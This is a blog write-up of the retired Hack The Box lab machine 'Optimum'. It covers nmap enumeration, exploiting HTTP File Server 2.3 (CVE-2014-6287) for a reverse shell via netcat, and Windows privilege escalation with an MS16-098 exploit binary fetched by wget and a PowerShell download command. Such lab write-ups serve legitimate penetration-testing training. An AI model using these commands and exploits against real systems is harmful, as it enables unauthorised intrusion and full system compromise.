Hack The Box Optimum Writeup

Hack The Box (HTB) is an online training platform to enhance skills in penetration testing. Optimum is a retired Windows-based box having IP

Box Details

Release18 March 2017

Start with Nmap

Run Nmap default scripts (-sC) and enumerate versions (-sV).

#nmap -sC -sV | tee nmap-initial.txt

To check all open ports

 #nmap -p- | tee nmap-all-ports.txt

Run UDP scan

#nmap -sU

As port 80 is open, try IP on web browser

Search on google to find exploit of HTTP File Server 2.3 and found CVE:2014-6287.

Read instruction to execute the payload

Identify nc.exe on Kali and copy it in current directory

#locate nc.exe

Edit payload with local IP and port. Save it. Use ifconfig to identify the IP address of your machine.

ip_addr = ""

local_port = "1111"

Execute the exploit

#nc -lvnp 1111
#python -m SimpleHTTPServer 80
#python exploit.py 80

Got shell. Check user token

Privilege Escalation

Use systeminfo to identify information of OS


Copy this output in text format (I have copied it in config-info.txt). Identify vulnerability by checking patches by using github repository code. Run privilege escalation exploit code by using below command:

#python windows-exploit-suggester.py --database 2020-12-02-mssb.xls --systeminfo config-info.txt

Many exploits available for privilege escalation. I have used "Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)". You can downlaod 41020.exe by using github repository.

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Transfer exe file to machine and execute it by using below command to get system.

powershell -c "(New-Object System.Net.WebClient).DownloadFile('','C:\Users\kostas\Desktop\41020.exe')"

Check by command "whoami". If output is below, got system.

nt authority\system


This article is a quick write-up on HTB Optimum Windows box. If you have some issues in any step, let me know in the comment section.

Subscribe us to receive more such articles updates in your email.

If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!

Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *